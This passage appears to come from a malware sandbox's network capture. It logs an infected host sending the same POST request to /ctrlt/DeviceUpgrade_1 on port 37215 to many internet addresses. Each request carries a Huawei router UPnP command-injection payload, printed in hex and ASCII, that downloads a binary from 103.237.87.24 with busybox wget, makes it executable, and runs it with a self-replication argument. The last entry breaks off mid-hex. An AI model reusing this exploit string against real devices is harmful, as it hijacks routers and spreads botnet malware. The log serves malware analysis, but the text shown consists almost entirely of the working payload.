                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2330192.168.2.133791241.11.101.20437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.623369932 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2331192.168.2.1349626197.181.211.10137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.623437881 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2332192.168.2.1353138157.54.97.15637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.623445034 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2333192.168.2.1359562157.222.99.12837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.623450994 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2334192.168.2.1345366157.195.139.15537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.623579025 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2335192.168.2.133545414.198.19.9237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.623589993 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2336192.168.2.1335702157.115.236.3537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.623593092 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2337192.168.2.135520841.95.87.2537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.623646975 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2338192.168.2.1337712197.213.101.4237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.623692989 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2339192.168.2.1336776180.91.146.20837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.623703003 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 